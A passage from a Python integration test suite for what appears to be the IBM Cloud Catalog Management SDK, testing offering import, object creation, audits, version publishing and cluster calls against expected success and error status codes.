assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=['rocks'],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2-patch',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_import_offering_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier='invalid-'+catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_import_offering(self):
global version_locator_id
assert catalog_id is not None
assert offering_id is not None
import_offering_response = self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
x_auth_token=self.git_auth_token,
)
assert import_offering_response.get_status_code() == 201
offering = import_offering_response.get_result()
assert offering is not None
assert offering['kinds'][0]['versions'][0]['version_locator'] is not None
version_locator_id = offering['kinds'][0]['versions'][0]['version_locator']
@needscredentials
def test_import_offering_returns_409_when_conflict_occurs(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering(
catalog_identifier=catalog_id,
tags=['python', 'sdk'],
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
offering_id=offering_id,
target_version='0.0.2',
repo_type=repo_type_git_public,
x_auth_token=<PASSWORD>auth_token,
)
except ApiException as e:
assert e.code == 409
####
# Reload Offering
####
@needscredentials
def test_reload_offering_returns_404_when_no_such_offering(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
target_version='0.0.2',
target_kinds=kind_roks,
zipurl=import_offering_zip_url,
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_reload_offering_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_version='0.0.2',
zipurl=import_offering_zip_url,
target_kinds=kind_vpe,
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_reload_offering(self):
assert catalog_id is not None
assert offering_id is not None
# Error: Could not find a kind with a target/format value of roks:operator for the current offering, Code: 400
reload_offering_response = self.catalog_management_service_authorized.reload_offering(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_version='0.0.2',
target_kinds=kind_roks,
zipurl=import_offering_zip_url,
repo_type=repo_type_git_public,
)
assert reload_offering_response.get_status_code() == 201
offering = reload_offering_response.get_result()
assert offering is not None
####
# Create Object
####
@needscredentials
def test_create_object_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=object_name,
crn=object_crn,
parent_id='bogus region name',
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_create_object_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_not_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=object_name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_create_object_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
try:
self.catalog_management_service_authorized.create_object(
catalog_identifier='invalid-'+catalog_id,
catalog_id='invalid-'+catalog_id,
name=object_name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_create_object(self):
global object_id
global created_object_ids
assert catalog_id is not None
for i in range(2):
publish_object_model = {
'permit_ibm_public_publish': True,
'ibm_approved': True,
'public_approved': True,
}
state_model = {
'current': 'new',
}
name = object_name+'_'+str(i)
create_object_response = self.catalog_management_service_authorized.create_object(
catalog_identifier=catalog_id,
catalog_id=catalog_id,
name=name,
crn=object_crn,
parent_id=region_us_south,
kind=kind_vpe,
publish=publish_object_model,
state=state_model,
)
assert create_object_response.get_status_code() == 201
catalog_object = create_object_response.get_result()
assert catalog_object is not None
assert catalog_object['id'] is not None
if object_id is None:
object_id = catalog_object['id']
created_object_ids.append(catalog_object['id'])
####
# Get Offering Audit
####
@needscredentials
def test_get_offering_audit_returns_200_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
get_offering_audit_response = self.catalog_management_service_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
)
assert get_offering_audit_response.get_status_code() == 200
@needscredentials
def test_get_offering_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_audit(self):
assert catalog_id is not None
assert offering_id is not None
get_offering_audit_response = self.catalog_management_service_authorized.get_offering_audit(
catalog_identifier=catalog_id,
offering_id=offering_id,
)
assert get_offering_audit_response.get_status_code() == 200
audit_log = get_offering_audit_response.get_result()
assert audit_log is not None
####
# Get Catalog Account
####
@needscredentials
def test_get_catalog_account(self):
get_catalog_account_response = self.catalog_management_service_authorized.get_catalog_account()
assert get_catalog_account_response.get_status_code() == 200
account = get_catalog_account_response.get_result()
assert account is not None
assert account['id'] == self.account_id
####
# Update Catalog Account
####
@needscredentials
def test_update_catalog_account_returns_400_when_no_such_account(self):
try:
self.catalog_management_service_authorized.update_catalog_account(
id='invalid-'+self.account_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_update_catalog_account_returns_403_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.update_catalog_account(
id=self.account_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_catalog_account_returns_400_when_backend_input_validation_fails(self):
# user is not granted for this operation
# a body with failing data comes here
update_catalog_account_response = self.catalog_management_service_authorized.update_catalog_account(
id=self.account_id,
hide_ibm_cloud_catalog=True,
)
assert update_catalog_account_response.get_status_code() == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_catalog_account(self):
# user is not granted for this operation
# a body with failing data comes here
update_catalog_account_response = self.catalog_management_service_authorized.update_catalog_account(
id=self.account_id,
)
assert update_catalog_account_response.get_status_code() == 200
assert update_catalog_account_response.get_result() is not None
####
# Get Catalog Account Audit
####
@needscredentials
def test_get_catalog_account_audit_returns_403_when_user_is_not_authorized(self):
try:
self.catalog_management_service_not_authorized.get_catalog_account_audit()
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog_account_audit(self):
get_catalog_account_audit_response = self.catalog_management_service_authorized.get_catalog_account_audit()
assert get_catalog_account_audit_response.get_status_code() == 200
assert get_catalog_account_audit_response.get_result() is not None
####
# Get Catalog Account Filters
####
@needscredentials
def test_get_catalog_account_filters_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog_account_filters(
catalog=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog_account_filters_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog_account_filters(
catalog='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_account_filters(self):
assert catalog_id is not None
get_catalog_account_filters_response = self.catalog_management_service_authorized.get_catalog_account_filters(
catalog=catalog_id,
)
assert get_catalog_account_filters_response.get_status_code() == 200
accumulated_filters = get_catalog_account_filters_response.get_result()
assert accumulated_filters is not None
####
# Get Catalog Audit
####
@needscredentials
def test_get_catalog_audit_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_catalog_audit(
catalog_identifier='invalid-'+catalog_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_catalog_audit_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_catalog_audit(
catalog_identifier=catalog_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_catalog_audit(self):
assert catalog_id is not None
get_catalog_audit_response = self.catalog_management_service_authorized.get_catalog_audit(
catalog_identifier=catalog_id,
)
assert get_catalog_audit_response.get_status_code() == 200
audit_log = get_catalog_audit_response.get_result()
assert audit_log is not None
####
# Get Consumption Offerings
####
@needscredentials
def test_get_consumption_offerings_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
try:
self.catalog_management_service_not_authorized.get_consumption_offerings(
catalog=catalog_id,
select='all',
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_consumption_offerings_returns_404_when_no_such_catalog(self):
assert catalog_id is not None
try:
self.catalog_management_service_authorized.get_consumption_offerings(
catalog='invalid-'+catalog_id,
select='all',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_consumption_offerings(self):
assert catalog_id is not None
get_consumption_offerings_response = self.catalog_management_service_authorized.get_consumption_offerings(
catalog=catalog_id,
select='all',
)
assert get_consumption_offerings_response.get_status_code() == 200
offering_search_result = get_consumption_offerings_response.get_result()
assert offering_search_result is not None
####
# Import Offering Version
####
@needscredentials
def test_import_offering_version_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=['rocks'],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_import_offering_version_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_import_offering_version_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_import_offering_version(self):
assert catalog_id is not None
assert offering_id is not None
import_offering_version_response = self.catalog_management_service_authorized.import_offering_version(
catalog_identifier=catalog_id,
offering_id=offering_id,
target_kinds=[kind_roks],
zipurl=import_offering_zip_url,
target_version='0.0.3',
repo_type=repo_type_git_public,
)
assert import_offering_version_response.get_status_code() == 201
offering = import_offering_version_response.get_result()
assert offering is not None
####
# Replace Offering Icon
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
try:
self.catalog_management_service_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
file_name='filename.jpg',
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
try:
self.catalog_management_service_not_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id=offering_id,
file_name='filename.jpg',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_replace_offering_icon(self):
assert catalog_id is not None
assert offering_id is not None
# this feature is disabled
replace_offering_icon_response = self.catalog_management_service_authorized.replace_offering_icon(
catalog_identifier=catalog_id,
offering_id=offering_id,
file_name='filename.jpg',
)
assert replace_offering_icon_response.get_status_code() == 200
offering = replace_offering_icon_response.get_result()
assert offering is not None
####
# Update Offering IBM
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted for this operation it can be executed
try:
self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='bogus approval type',
approved='true',
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted for this operation 404 can be squeezed out from the system, until then it is disabled
try:
self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
approval_type='allow_request',
approved='true',
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_update_offering_ibm_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='allow_request',
approved='true',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_update_offering_ibm(self):
assert catalog_id is not None
assert offering_id is not None
# once the user is granted for this operation it can be executed
update_offering_ibm_response = self.catalog_management_service_authorized.update_offering_ibm(
catalog_identifier=catalog_id,
offering_id=offering_id,
approval_type='allow_request',
approved='true',
)
assert update_offering_ibm_response.get_status_code() == 200
approval_result = update_offering_ibm_response.get_result()
assert approval_result is not None
####
# Get Offering Updates
####
@needscredentials
def test_get_offering_updates_returns_400_when_backend_input_validation_fails(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind='rocks',
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_updates_returns_404_when_no_such_offerings(self):
assert catalog_id is not None
assert offering_id is not None
# it always complaining about offering types which is somehow related to create/import offerings
# once this is resolved there is a chance we can squeeze a 404 out from the service
try:
self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id='invalid-'+offering_id,
version='0.0.2',
kind=kind_vpe,
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_updates_returns_403_when_user_is_not_authorized(self):
assert catalog_id is not None
assert offering_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind=kind_roks,
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_updates(self):
assert catalog_id is not None
assert offering_id is not None
# requires a special offering
# Error: Could not find kind[roks] for offering
get_offering_updates_response = self.catalog_management_service_authorized.get_offering_updates(
catalog_identifier=catalog_id,
offering_id=offering_id,
kind=kind_roks,
version='0.0.2',
cluster_id=self.cluster_id,
region=region_us_south,
namespace=namespace_python_sdk,
)
assert get_offering_updates_response.get_status_code() == 200
list_version_update_descriptor = get_offering_updates_response.get_result()
assert list_version_update_descriptor is not None
####
# Get Offering About
####
@needscredentials
def test_get_offering_about_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_about(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_about_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_about(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_about_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_about(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_about(self):
assert version_locator_id is not None
get_offering_about_response = self.catalog_management_service_authorized.get_offering_about(
version_loc_id=version_locator_id,
)
assert get_offering_about_response.get_status_code() == 200
result = get_offering_about_response.get_result()
assert result is not None
####
# Get Offering License
####
@needscredentials
def test_get_offering_license_returns_400_when_backend_input_validation_fails(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_license(
version_loc_id=bogus_version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_license_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_license(
version_loc_id='invalid-'+version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_license_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_license(
version_loc_id=version_locator_id,
license_id='license-id-is-needed',
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_license(self):
assert version_locator_id is not None
get_offering_license_response = self.catalog_management_service_authorized.get_offering_license(
version_loc_id=version_locator_id,
license_id='license-id-is-needed',
)
assert get_offering_license_response.get_status_code() == 200
result = get_offering_license_response.get_result()
assert result is not None
####
# Get Offering Container Images
####
@needscredentials
def test_get_offering_container_images_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_container_images_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_offering_container_images_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_container_images(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_container_images(self):
assert version_locator_id is not None
get_offering_container_images_response = self.catalog_management_service_authorized.get_offering_container_images(
version_loc_id=version_locator_id,
)
assert get_offering_container_images_response.get_status_code() == 200
image_manifest = get_offering_container_images_response.get_result()
assert image_manifest is not None
####
# Deprecate Version
####
@needscredentials
def test_deprecate_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.deprecate_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_deprecate_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.deprecate_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_deprecate_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.deprecate_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_deprecate_version(self):
assert version_locator_id is not None
# the flow of different states
# Error: Cannot request the state deprecated from the current state new.
deprecate_version_response = self.catalog_management_service_authorized.deprecate_version(
version_loc_id=version_locator_id
)
assert deprecate_version_response.get_status_code() == 202
####
# Account Publish Version
####
@needscredentials
def test_account_publish_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.account_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_account_publish_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.account_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_account_publish_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.account_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_account_publish_version(self):
assert version_locator_id is not None
# the phases of different states is unknown
# Error: Cannot request the state account-published from the current state new.
account_publish_version_response = self.catalog_management_service_authorized.account_publish_version(
version_loc_id=version_locator_id,
)
assert account_publish_version_response.get_status_code() == 202
####
# IBM Publish Version
####
@needscredentials
def test_ibm_publish_version_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_ibm_publish_version_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_ibm_publish_version_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.ibm_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_ibm_publish_version(self):
assert version_locator_id is not None
# user is not allowed to publish
ibm_publish_version_response = self.catalog_management_service_authorized.ibm_publish_version(
version_loc_id=version_locator_id,
)
assert ibm_publish_version_response.get_status_code() == 202
####
# Public Publish Version
####
@needscredentials
def test_public_publish_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.public_publish_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_public_publish_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.public_publish_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_public_publish_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.public_publish_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_public_publish_version(self):
assert version_locator_id is not None
# user is not granted
public_publish_version_response = self.catalog_management_service_authorized.public_publish_version(
version_loc_id=version_locator_id,
)
assert public_publish_version_response.get_status_code() == 202
####
# Commit Version
####
@needscredentials
def test_commit_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.commit_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_commit_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.commit_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_commit_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.commit_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_commit_version(self):
assert version_locator_id is not None
# workflow of versions
# Error: Could not find a working copy for the active version with id
commit_version_response = self.catalog_management_service_authorized.commit_version(
version_loc_id=version_locator_id,
)
assert commit_version_response.get_status_code() == 200
####
# Copy Version
####
@needscredentials
def test_copy_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.copy_version(
version_loc_id=version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_copy_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.copy_version(
version_loc_id='invalid-'+version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_copy_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.copy_version(
version_loc_id=bogus_version_locator_id,
target_kinds=[kind_roks],
)
except ApiException as e:
assert e.code == 400
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_copy_version(self):
assert version_locator_id is not None
# Error: Only helm charts can be copied to a new target at this time.
copy_version_response = self.catalog_management_service_authorized.copy_version(
version_loc_id=version_locator_id,
target_kinds=[kind_roks],
)
assert copy_version_response.get_status_code() == 200
####
# Get Offering Working Copy
####
@needscredentials
def test_get_offering_working_copy_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_offering_working_copy_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_offering_working_copy(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_offering_working_copy_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_offering_working_copy(self):
assert version_locator_id is not None
# workflow problem
# Error: Cannot create a working copy for version 60cb36c3-39fd-40ed-9887-6bc98aa7b7be. The version
# must be in a published state, deprecated state, or invalidated state to create a working copy
get_offering_working_copy_response = self.catalog_management_service_authorized.get_offering_working_copy(
version_loc_id=version_locator_id,
)
assert get_offering_working_copy_response.get_status_code() == 200
version = get_offering_working_copy_response.get_result()
assert version is not None
####
# Get Version
####
@needscredentials
def test_get_version_returns_400_when_backend_input_validation_fails(self):
try:
self.catalog_management_service_authorized.get_version(
version_loc_id=bogus_version_locator_id,
)
except ApiException as e:
assert e.code == 400
@needscredentials
def test_get_version_returns_404_when_no_such_version(self):
assert version_locator_id is not None
try:
self.catalog_management_service_authorized.get_version(
version_loc_id='invalid-'+version_locator_id,
)
except ApiException as e:
assert e.code == 404
@needscredentials
def test_get_version_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.get_version(
version_loc_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_version(self):
assert version_locator_id is not None
get_version_response = self.catalog_management_service_authorized.get_version(
version_loc_id=version_locator_id,
)
assert get_version_response.get_status_code() == 200
offering = get_version_response.get_result()
assert offering is not None
####
# Get Cluster
####
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_cluster_returns_403_when_user_is_not_authorized(self):
# possibly this user doesn't have right to execute this operation
try:
self.catalog_management_service_not_authorized.get_cluster(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
def test_get_cluster_returns_404_when_no_such_cluster(self):
try:
self.catalog_management_service_authorized.get_cluster(
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_cluster(self):
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
get_cluster_response = self.catalog_management_service_authorized.get_cluster(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_cluster_response.get_status_code() == 200
cluster_info = get_cluster_response.get_result()
assert cluster_info is not None
####
# Get Namespaces
####
@needscredentials
def test_get_namespaces_returns_404_when_no_such_cluster(self):
try:
self.catalog_management_service_authorized.get_namespaces(
cluster_id='invalid-'+self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
except ApiException as e:
assert e.code == 404
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_namespaces_returns_403_when_user_is_not_authorized(self):
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
try:
self.catalog_management_service_not_authorized.get_namespaces(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_not_authorized,
)
except ApiException as e:
assert e.code == 403
@needscredentials
@pytest.mark.skip(reason='Skipped by design')
def test_get_namespaces(self):
# possibly this user doesn't have right to get the cluster details
# until it is not clear it is skipped
# The specified cluster could not be found. If applicable, make sure that you target the correct account
# and resource group."
get_namespaces_response = self.catalog_management_service_authorized.get_namespaces(
cluster_id=self.cluster_id,
region=region_us_south,
x_auth_refresh_token=self.refresh_token_authorized,
)
assert get_namespaces_response.get_status_code() == 200
namespace_search_result = get_namespaces_response.get_result()
assert namespace_search_result is not None
####
# Deploy Operators
####
@needscredentials
def test_deploy_operators_returns_403_when_user_is_not_authorized(self):
assert version_locator_id is not None
try:
self.catalog_management_service_not_authorized.deploy_operators(
x_auth_refresh_token=self.refresh_token_not_authorized,
cluster_id=self.cluster_id,
region=region_us_south,
all_namespaces=True,
version_locator_id=version_locator_id,
)
except ApiException as e:
assert e.code == 403
@needscredentials
